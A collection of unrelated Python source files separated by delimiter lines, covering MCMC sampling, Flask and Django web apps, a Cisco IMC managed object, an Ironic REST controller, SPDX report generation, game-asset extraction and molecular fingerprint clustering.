lp += log_posterior_good_bad(p, x) # outlier detection for bad data
lp += log_posterior_good_bad(P, m) # outlier detection, effects!
return lp
def mcmc(data, inds, n_burn=5000, n_steps=5000, a=2, total=df.shape[0]):
"""
A parser that sets up and executes an emcee-based MCMC for a
hierarchical binomial beta distribution.
Takes in two lists of data (natt, nc) and returns an
EnsembleSampler object.
"""
n_dim = 4*len(inds) - 4 + total + 3 # no. of dimensions
n_walkers = n_dim*50 # number of MCMC walkers
# p0[i,j] is the starting point for walk i along variable j.
p0 = np.empty((n_walkers, n_dim))
# initialize parameters
p0 = np.empty((n_walkers, n_dim))
L = len(inds) - 1
for i in range(0, len(inds)):
p0[:, i] = np.random.uniform(-5, 5, n_walkers) # mu
p0[:, i + L] = np.random.exponential(5.0, n_walkers) # sigma
p0[:, i + 2*L] = np.random.exponential(5.0, n_walkers) # sigma_bad
p0[:, i + 3*L] = np.random.uniform(0.0, 1.0, n_walkers) # G_i
for i in range(0, total):
p0[:, i + 4*L] = np.random.uniform(0.0, 1.0, n_walkers) # g_i
p0[:, -3] = np.random.uniform(-5, 5, n_walkers) # M
p0[:, -2] = np.random.exponential(5.0, n_walkers) # S
p0[:, -1] = np.random.exponential(5.0, n_walkers) # S_bad
# set up the sampler
sampler = emcee.EnsembleSampler(n_walkers, n_dim, log_post_hierarchical,
args=(data, inds,), threads=6, a=a)
# Do burn-in
pos, prob, state = sampler.run_mcmc(p0, n_burn, storechain=False)
# Sample again, starting from end burn-in state
_ = sampler.run_mcmc(pos, n_steps)
return sampler
sampler = mcmc(z_dead_vals, inds, n_burn=5000, n_steps=5000, a=2,
total=df.shape[0])
|
from web_temp import web
from server.proxy import server_proxy
import os
import sys
from multiprocessing import Process,Lock
import time
def work1():
# lock.acquire()
time.sleep(1)
print(1111)
web.app.run(host='0.0.0.0',port=5000,debug=False)
# lock.release()
def work2():
time.sleep(2)
print(2222)
# lock.acquire()
server_proxy.app.run(host='0.0.0.0',port=8081,debug=False)
# lock.release()
if __name__ == '__main__':
os.chdir(sys.path[0])
lock=Lock()
p1 = Process(target=work1)
p1.start()
p2 = Process(target=work2)
p2.start()
# if __name__ == '__main__':
# os.chdir(sys.path[0])
# # web.app.run(port=5000,debug=False)
# lock = Lock()
# p2 = Process(target=work2, args=(lock,))
# p2.start()
# # server_proxy.app.run(port=8081,debug=False) |
"""This module contains the general information for EquipmentTpm ManagedObject."""
from ...imcmo import ManagedObject
from ...imccoremeta import MoPropertyMeta, MoMeta
from ...imcmeta import VersionMeta
class EquipmentTpmConsts:
ACTIVE_STATUS_NA = "NA"
ACTIVE_STATUS_ACTIVATED = "activated"
ACTIVE_STATUS_DEACTIVATED = "deactivated"
ACTIVE_STATUS_UNKNOWN = "unknown"
ENABLED_STATUS_NA = "NA"
ENABLED_STATUS_DISABLED = "disabled"
ENABLED_STATUS_ENABLED = "enabled"
ENABLED_STATUS_UNKNOWN = "unknown"
OWNERSHIP_NA = "NA"
OWNERSHIP_OWNED = "owned"
OWNERSHIP_UNKNOWN = "unknown"
OWNERSHIP_UNOWNED = "unowned"
PRESENCE_NA = "NA"
PRESENCE_EMPTY = "empty"
PRESENCE_EQUIPPED = "equipped"
PRESENCE_EQUIPPED_IDENTITY_UNESTABLISHABLE = "equipped-identity-unestablishable"
PRESENCE_EQUIPPED_NOT_PRIMARY = "equipped-not-primary"
PRESENCE_EQUIPPED_WITH_MALFORMED_FRU = "equipped-with-malformed-fru"
PRESENCE_INACCESSIBLE = "inaccessible"
PRESENCE_MISMATCH = "mismatch"
PRESENCE_MISMATCH_IDENTITY_UNESTABLISHABLE = "mismatch-identity-unestablishable"
PRESENCE_MISSING = "missing"
PRESENCE_NOT_SUPPORTED = "not-supported"
PRESENCE_UNAUTHORIZED = "unauthorized"
PRESENCE_UNKNOWN = "unknown"
class EquipmentTpm(ManagedObject):
"""This is EquipmentTpm class."""
consts = EquipmentTpmConsts()
naming_props = set([])
mo_meta = {
"classic": MoMeta("EquipmentTpm", "equipmentTpm", "tpm", VersionMeta.Version201a, "OutputOnly", 0xf, [], ["read-only"], ['computeBoard'], [], ["Get"]),
"modular": MoMeta("EquipmentTpm", "equipmentTpm", "tpm", VersionMeta.Version2013e, "OutputOnly", 0xf, [], ["read-only"], ['computeBoard'], [], ["Get"])
}
prop_meta = {
"classic": {
"active_status": MoPropertyMeta("active_status", "activeStatus", "string", VersionMeta.Version201a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["NA", "activated", "deactivated", "unknown"], []),
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version201a, MoPropertyMeta.INTERNAL, None, None, None, None, [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version201a, MoPropertyMeta.READ_ONLY, 0x2, 0, 255, None, [], []),
"enabled_status": MoPropertyMeta("enabled_status", "enabledStatus", "string", VersionMeta.Version201a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["NA", "disabled", "enabled", "unknown"], []),
"model": MoPropertyMeta("model", "model", "string", VersionMeta.Version201a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"ownership": MoPropertyMeta("ownership", "ownership", "string", VersionMeta.Version201a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["NA", "owned", "unknown", "unowned"], []),
"presence": MoPropertyMeta("presence", "presence", "string", VersionMeta.Version201a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["NA", "empty", "equipped", "equipped-identity-unestablishable", "equipped-not-primary", "equipped-with-malformed-fru", "inaccessible", "mismatch", "mismatch-identity-unestablishable", "missing", "not-supported", "unauthorized", "unknown"], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version201a, MoPropertyMeta.READ_ONLY, 0x4, 0, 255, None, [], []),
"serial": MoPropertyMeta("serial", "serial", "string", VersionMeta.Version201a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version201a, MoPropertyMeta.READ_ONLY, 0x8, None, None, r"""((removed|created|modified|deleted),){0,3}(removed|created|modified|deleted){0,1}""", [], []),
"tpm_revision": MoPropertyMeta("tpm_revision", "tpmRevision", "string", VersionMeta.Version201a, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"vendor": MoPropertyMeta("vendor", "vendor", "string", VersionMeta.Version201a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"version": MoPropertyMeta("version", "version", "string", VersionMeta.Version201a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
},
"modular": {
"active_status": MoPropertyMeta("active_status", "activeStatus", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, None, None, None, None, ["NA", "activated", "deactivated", "unknown"], []),
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version2013e, MoPropertyMeta.INTERNAL, None, None, None, None, [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, 0x2, 0, 255, None, [], []),
"enabled_status": MoPropertyMeta("enabled_status", "enabledStatus", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, None, None, None, None, ["NA", "disabled", "enabled", "unknown"], []),
"model": MoPropertyMeta("model", "model", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"ownership": MoPropertyMeta("ownership", "ownership", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, None, None, None, None, ["NA", "owned", "unknown", "unowned"], []),
"presence": MoPropertyMeta("presence", "presence", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, None, None, None, None, ["NA", "empty", "equipped", "equipped-identity-unestablishable", "equipped-not-primary", "equipped-with-malformed-fru", "inaccessible", "mismatch", "mismatch-identity-unestablishable", "missing", "not-supported", "unauthorized", "unknown"], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, 0x4, 0, 255, None, [], []),
"serial": MoPropertyMeta("serial", "serial", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, 0x8, None, None, r"""((removed|created|modified|deleted),){0,3}(removed|created|modified|deleted){0,1}""", [], []),
"tpm_revision": MoPropertyMeta("tpm_revision", "tpmRevision", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, None, None, None, None, [], []),
"vendor": MoPropertyMeta("vendor", "vendor", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"version": MoPropertyMeta("version", "version", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
},
}
prop_map = {
"classic": {
"activeStatus": "active_status",
"childAction": "child_action",
"dn": "dn",
"enabledStatus": "enabled_status",
"model": "model",
"ownership": "ownership",
"presence": "presence",
"rn": "rn",
"serial": "serial",
"status": "status",
"tpmRevision": "tpm_revision",
"vendor": "vendor",
"version": "version",
},
"modular": {
"activeStatus": "active_status",
"childAction": "child_action",
"dn": "dn",
"enabledStatus": "enabled_status",
"model": "model",
"ownership": "ownership",
"presence": "presence",
"rn": "rn",
"serial": "serial",
"status": "status",
"tpmRevision": "tpm_revision",
"vendor": "vendor",
"version": "version",
},
}
def __init__(self, parent_mo_or_dn, **kwargs):
self._dirty_mask = 0
self.active_status = None
self.child_action = None
self.enabled_status = None
self.model = None
self.ownership = None
self.presence = None
self.serial = None
self.status = None
self.tpm_revision = None
self.vendor = None
self.version = None
ManagedObject.__init__(self, "EquipmentTpm", parent_mo_or_dn, **kwargs)
|
# Copyright (c) 2017 Hitachi, Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from http import client as http_client
import pecan
from pecan import rest
from ironic import api
from ironic.api.controllers import base
from ironic.api.controllers import link
from ironic.api.controllers.v1 import utils as api_utils
from ironic.api.controllers.v1 import volume_connector
from ironic.api.controllers.v1 import volume_target
from ironic.api import expose
from ironic.common import exception
from ironic.common import policy
class Volume(base.APIBase):
"""API representation of a volume root.
This class exists as a root class for the volume connectors and volume
targets controllers.
"""
links = None
"""A list containing a self link and associated volume links"""
connectors = None
"""Links to the volume connectors resource"""
targets = None
"""Links to the volume targets resource"""
@staticmethod
def convert(node_ident=None):
url = api.request.public_url
volume = Volume()
if node_ident:
resource = 'nodes'
args = '%s/volume/' % node_ident
else:
resource = 'volume'
args = ''
volume.links = [
link.make_link('self', url, resource, args),
link.make_link('bookmark', url, resource, args,
bookmark=True)]
volume.connectors = [
link.make_link('self', url, resource, args + 'connectors'),
link.make_link('bookmark', url, resource, args + 'connectors',
bookmark=True)]
volume.targets = [
link.make_link('self', url, resource, args + 'targets'),
link.make_link('bookmark', url, resource, args + 'targets',
bookmark=True)]
return volume
class VolumeController(rest.RestController):
"""REST controller for volume root"""
_subcontroller_map = {
'connectors': volume_connector.VolumeConnectorsController,
'targets': volume_target.VolumeTargetsController
}
def __init__(self, node_ident=None):
super(VolumeController, self).__init__()
self.parent_node_ident = node_ident
@expose.expose(Volume)
def get(self):
if not api_utils.allow_volume():
raise exception.NotFound()
cdict = api.request.context.to_policy_values()
policy.authorize('baremetal:volume:get', cdict, cdict)
return Volume.convert(self.parent_node_ident)
@pecan.expose()
def _lookup(self, subres, *remainder):
if not api_utils.allow_volume():
pecan.abort(http_client.NOT_FOUND)
subcontroller = self._subcontroller_map.get(subres)
if subcontroller:
return subcontroller(node_ident=self.parent_node_ident), remainder
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2021 VMware, Inc. All Rights Reserved.
# SPDX-License-Identifier: BSD-2-Clause
"""
SPDX JSON document generator
"""
import json
import logging
from tern.formats.spdx.spdx import SPDX
from tern.formats.spdx import spdx_common
from tern.utils.general import get_git_rev_or_version
from tern.utils import constants
from tern.formats.spdx.spdxjson import formats as json_formats
from tern.formats.spdx.spdxjson import image_helpers as mhelpers
from tern.formats.spdx.spdxjson import file_helpers as fhelpers
from tern.formats.spdx.spdxjson import layer_helpers as lhelpers
from tern.formats.spdx.spdxjson import package_helpers as phelpers
from tern.formats import generator
# global logger
logger = logging.getLogger(constants.logger_name)
def get_document_namespace(image_obj):
'''Given the image object, return a unique SPDX document uri.
This is a combination of the tool name and version, the image name
and the uuid'''
return json_formats.document_namespace.format(
version=get_git_rev_or_version()[1], image=image_obj.name,
uuid=spdx_common.get_uuid())
def get_document_namespace_snapshot(timestamp):
"""Get the document namespace for the container image snapshot. We pass
the timestamp so we have a common timestamp across the whole document"""
return json_formats.document_namespace_snapshot.format(
timestamp=timestamp, uuid=spdx_common.get_uuid())
def get_document_dict(image_obj, template):
'''Return document info as a dictionary'''
docu_dict = {
'SPDXID': json_formats.spdx_id,
'spdxVersion': json_formats.spdx_version,
'creationInfo': {
'created': json_formats.created.format(
timestamp=spdx_common.get_timestamp()),
'creators': json_formats.creator.format(
version=get_git_rev_or_version()[1]),
'licenseListVersion': json_formats.license_list_version,
},
'name': json_formats.document_name.format(image_name=image_obj.name),
'dataLicense': json_formats.data_license,
'comment': json_formats.document_comment,
'documentNamespace': get_document_namespace(image_obj),
'documentDescribes': [spdx_common.get_image_spdxref(image_obj)],
'packages': [
# image dict will be a single dictionary
# we'll add the layer and package dicts later if available
mhelpers.get_image_dict(image_obj, template)],
'relationships': lhelpers.get_image_layer_relationships(image_obj)
}
# Add list of layer dictionaries to packages list
docu_dict['packages'] += lhelpers.get_layers_list(image_obj)
# Add list of package dictionaries to packages list, if they exist
pkgs_dict_list = phelpers.get_packages_list(image_obj, template)
if pkgs_dict_list:
docu_dict['packages'] += pkgs_dict_list
# Add list of file dictionaries, if they exist
files = fhelpers.get_files_list(image_obj, template)
if files:
docu_dict['files'] = files
# Add package and file extracted license texts, if they exist
extracted_texts = mhelpers.get_image_extracted_licenses(image_obj)
if extracted_texts:
docu_dict['hasExtractedLicensingInfos'] = extracted_texts
return docu_dict
def get_document_dict_snapshot(layer_obj, template):
"""This is the SPDX document containing just the packages found at
container build time"""
timestamp = spdx_common.get_timestamp()
docu_dict = {
'SPDXID': json_formats.spdx_id,
'spdxVersion': json_formats.spdx_version,
'creationInfo': {
'created': json_formats.created.format(
timestamp=timestamp),
'creators': json_formats.creator.format(
version=get_git_rev_or_version()[1]),
'licenseListVersion': json_formats.license_list_version,
},
'name': json_formats.document_name_snapshot,
'dataLicense': json_formats.data_license,
'comment': json_formats.document_comment,
'documentNamespace': get_document_namespace_snapshot(timestamp),
# we will list all the unique package SPDXRefs here later
'documentDescribes': [],
# these will contain just the packages as there is no layer
# package at the time of this document's generation
'packages': [],
# we will fill in document to package ref relationships later
'relationships': []
}
# Add list of package dictionaries to packages list, if they exist
pkgs_dict_list, package_refs = phelpers.get_layer_packages_list(
layer_obj, template)
if pkgs_dict_list:
docu_dict['packages'] = pkgs_dict_list
docu_dict['documentDescribes'] = package_refs
# add the package relationships to the document
for ref in package_refs:
docu_dict['relationships'].append(json_formats.get_relationship_dict(
json_formats.spdx_id, ref, 'DESCRIBES'))
# Add list of file dictionaries, if they exist
files = fhelpers.get_layer_files_list(layer_obj, template, timestamp)
if files:
docu_dict['files'] = files
# Add package and file extracted license texts, if they exist
extracted_texts = lhelpers.get_layer_extracted_licenses(layer_obj)
if extracted_texts:
docu_dict['hasExtractedLicensingInfos'] = extracted_texts
return docu_dict
class SpdxJSON(generator.Generate):
def generate(self, image_obj_list, print_inclusive=False):
'''Generate an SPDX document
WARNING: This assumes that the list consists of one image or the base
image and a stub image, in which case, the information in the stub
image is not applicable in the SPDX case as it is an empty image
object with no metadata as nothing got built.
The whole document should be stored in a dictionary which can be
converted to JSON and dumped to a file using the write_report function
in report.py.
For the sake of SPDX, an image is a 'Package' which 'CONTAINS' each
layer which is also a 'Package' which 'CONTAINS' the real Packages'''
logger.debug("Generating SPDX JSON document...")
# we still don't know how SPDX documents could represent multiple
# images. Hence we will assume only one image is analyzed and the
# input is a list of length 1
image_obj = image_obj_list[0]
template = SPDX()
report = get_document_dict(image_obj, template)
return json.dumps(report)
def generate_layer(self, layer):
"""Generate an SPDX document containing package and file information
at container build time"""
logger.debug("Generating SPDX JSON document...")
template = SPDX()
report = get_document_dict_snapshot(layer, template)
return json.dumps(report)
|
from django.utils.functional import cached_property
from orders.models import Order
from users.models import User
from users.services import UserCreator
class OrderEmailChanger:
def __init__(self, order: Order, email: str):
self.order = order
self.email = email
def __call__(self):
if self.was_shipped:
self.order.unship()
self.order.user = self.get_user()
self.order.save()
if self.was_shipped:
self.order.ship()
@cached_property
def was_shipped(self) -> bool:
return self.order.shipped is not None
def get_user(self) -> User:
user: User = self.order.user
user_creator = UserCreator(email=self.email, name=f'{user.first_name} {user.last_name}')
return user_creator()
|
def pytest_addoption(parser):
"""
add `--show-viewer` as a valid command line flag
"""
parser.addoption(
"--show-viewer",
action="store_true",
default=False,
help="don't show viewer during tests",
)
|
# -*- coding: utf-8 -*-
import phyre, importlib, os
importlib.reload(phyre)
# 1 or 2
ffx=1
# pc, npc, mon, obj, skl, sum, or wep
tp = 'pc'
# model number (no leading zeros)
num = 106
ffxBaseDir=r'C:\SteamLibrary\steamapps\common\FINAL FANTASY FFX&FFX-2 HD Remaster\data\FFX_Data_VBF\ffx_data\gamedata\ps3data\chr'
ffx2BaseDir=r'C:\SteamLibrary\steamapps\common\FINAL FANTASY FFX&FFX-2 HD Remaster\data\FFX2_Data_VBF\ffx-2_data\gamedata\ps3data\chr'
baseDir=[ffxBaseDir, ffx2BaseDir]
types={'pc':'c', 'npc':'n', 'mon':'m', 'obj':'f', 'skl':'k', 'sum':'s', 'wep':'w'}
file=baseDir[ffx-1]
cs = types[tp] + '%03d' % num
meshFile = os.path.join(file, tp, cs,'mdl','d3d11', cs + r'.dae.phyre')
ddsFile = os.path.join(file, tp, cs, 'tex', 'd3d11', cs + r'.dds.phyre')
outFile = r'mytest.obj'
outFile2 = r'mytest.dds'
#outFile = None
phyre.extractMesh(meshFile,outFile, debug=False)
print("\n")
if os.path.isfile(ddsFile):
phyre.extractDDS(ddsFile, outFile2)
else:
print("DDS file not found. Skipping") |
from django.conf import settings as django_settings
class LazySettings(object):
@property
def DJANGO_LIVE_TEST_SERVER_ADDRESS(self):
"""Address at which to run the test server"""
return getattr(django_settings, 'DJANGO_LIVE_TEST_SERVER_ADDRESS',
'localhost:9001')
@property
def SELENIUM_TEST_COMMAND_OPTIONS(self):
"""Extra options to provide to the test runner"""
return getattr(django_settings, 'SELENIUM_TEST_COMMAND_OPTIONS', {})
@property
def SELENIUM_DEFAULT_BROWSER(self):
"""Default browser to use when running tests"""
return getattr(django_settings, 'SELENIUM_DEFAULT_BROWSER', ['chrome'])
@property
def SELENIUM_DEFAULT_TESTS(self):
"""Default Selenium test package to run"""
return getattr(django_settings, 'SELENIUM_DEFAULT_TESTS', [])
@property
def SELENIUM_POLL_FREQUENCY(self):
"""Default operation retry frequency"""
return getattr(django_settings, 'SELENIUM_POLL_FREQUENCY', 0.5)
@property
def SELENIUM_JAR_PATH(self):
"""Absolute path to the Selenium server jar file"""
return getattr(django_settings, 'SELENIUM_JAR_PATH', '')
@property
def SELENIUM_SAUCE_API_KEY(self):
"""API key for the Sauce Labs account to use for running tests"""
return getattr(django_settings, 'SELENIUM_SAUCE_API_KEY', '')
@property
def SELENIUM_SAUCE_CONNECT_PATH(self):
"""Absolute path to the Sauce Connect binary (for Sauce Labs)"""
return getattr(django_settings, 'SELENIUM_SAUCE_CONNECT_PATH', '')
@property
def SELENIUM_SAUCE_USERNAME(self):
"""Username for the Sauce Labs account to use for running tests"""
return getattr(django_settings, 'SELENIUM_SAUCE_USERNAME', '')
@property
def SELENIUM_SAUCE_VERSION(self):
"""Version of Selenium to use in the Sauce Labs virtual machines. If
omitted, uses the current default version used by Sauce Labs."""
return getattr(django_settings, 'SELENIUM_SAUCE_VERSION', '')
@property
def SELENIUM_SCREENSHOT_DIR(self):
"""Directory in which to store screenshots"""
return getattr(django_settings, 'SELENIUM_SCREENSHOT_DIR', '')
@property
def SELENIUM_TIMEOUT(self):
"""Default operation timeout in seconds"""
return getattr(django_settings, 'SELENIUM_TIMEOUT', 10)
@property
def SELENIUM_PAGE_LOAD_TIMEOUT(self):
"""Connection timeout for page load GET requests in seconds"""
return getattr(django_settings, 'SELENIUM_PAGE_LOAD_TIMEOUT', 10)
settings = LazySettings()
|
import re
import logging
from rdkit import DataStructs
from rdkit.ML.Cluster import Butina
from luna.util.exceptions import IllegalArgumentError
logger = logging.getLogger()
def available_similarity_functions():
"""Return a list of all similarity metrics available at RDKit."""
regex = re.compile("Bulk([a-zA-Z]+)Similarity", flags=0)
return list(filter(regex.match, dir(DataStructs)))
def calc_distance_matrix(fps, similarity_func="BulkTanimotoSimilarity"):
"""Calculate the pairwise distance (dissimilarity) between fingerprints in ``fps`` using
the similarity metric ``similarity_func``.
Parameters
----------
fps : iterable of RDKit :class:`~rdkit.DataStructs.cDataStructs.ExplicitBitVect` or :class:`~rdkit.DataStructs.cDataStructs.SparseBitVect`
A sequence of fingerprints.
similarity_func : str
A similarity metric to calculate the distance between the provided fingerprints. The default value is 'BulkTanimotoSimilarity'.
To check out the list of available similarity metrics, call the function :py:meth:`available_similarity_functions`.
Examples
--------
First, let's define a set of molecules.
>>> from luna.wrappers.base import MolWrapper
>>> mols = [MolWrapper.from_smiles("CCCCCC").unwrap(),
... MolWrapper.from_smiles("CCCCCCCC").unwrap(),
... MolWrapper.from_smiles("CCCCCCCCO").unwrap()]
Now, we generate fingerprints for those molecules.
>>> from luna.mol.fingerprint import generate_fp_for_mols
>>> fps = [d["fp"] for d in generate_fp_for_mols(mols, "morgan_fp")]
Finally, calculate the distance between the molecules based on their fingerprints.
>>> from luna.mol.clustering import calc_distance_matrix
>>> print(calc_distance_matrix(fps))
[0.125, 0.46153846153846156, 0.3846153846153846]
Returns
-------
distances : list of float
Flattened diagonal matrix.
"""
funcs = available_similarity_functions()
if similarity_func not in funcs:
raise IllegalArgumentError("Similarity function not available.")
dists = []
for i in range(1, len(fps)):
if (similarity_func == "BulkTverskySimilarity"):
params = [fps[i], fps[:i], 0, 1]
else:
params = [fps[i], fps[:i]]
sims = getattr(DataStructs, similarity_func)(*params)
dists.extend([1 - x for x in sims])
return dists
def cluster_fps(fps, cutoff=0.2, similarity_func="BulkTanimotoSimilarity"):
"""Clusterize molecules based on fingerprints using the Butina clustering algorithm.
Parameters
----------
fps : iterable of RDKit :class:`~rdkit.DataStructs.cDataStructs.ExplicitBitVect` or :class:`~rdkit.DataStructs.cDataStructs.SparseBitVect`
A sequence of fingerprints.
cutoff : float
Elements within this range of each other are considered to be neighbors.
similarity_func : str
A similarity metric to calculate the distance between the provided fingerprints. The default value is 'BulkTanimotoSimilarity'.
To check out the list of available similarity metrics, call the function :py:meth:`available_similarity_functions`.
Examples
--------
First, let's define a set of molecules.
>>> from luna.wrappers.base import MolWrapper
>>> mols = [MolWrapper.from_smiles("CCCCCC").unwrap(),
... MolWrapper.from_smiles("CCCCCCCC").unwrap(),
... MolWrapper.from_smiles("CCCCCCCCO").unwrap()]
Now, we generate fingerprints for those molecules.
>>> from luna.mol.fingerprint import generate_fp_for_mols
>>> fps = [d["fp"] for d in generate_fp_for_mols(mols, "morgan_fp")]
Finally, clusterize the molecules based on their fingerprints.
>>> from luna.mol.clustering import cluster_fps
>>> print(cluster_fps(fps, cutoff=0.2))
((1, 0), (2,))
Returns
-------
clusters : tuple of tuples
Each cluster is defined as a tuple of tuples, where the first element for each cluster is its centroid.
"""
logger.debug("Trying to clusterize %d molecules." % len(fps))
logger.debug("Defined cutoff: %.2f. Defined similarity function: %s." % (cutoff, similarity_func))
# first generate the distance matrix.
dists = calc_distance_matrix(fps, similarity_func)
logger.debug("Distance matrix created.")
# now cluster the data.
cs = Butina.ClusterData(dists, len(fps), cutoff, isDistData=True)
logger.debug("Number of cluster(s) created: %d." % len(cs))
return cs
|
from flask import Blueprint
assets = Blueprint('assets', __name__)
from . import api
|
Subsets and Splits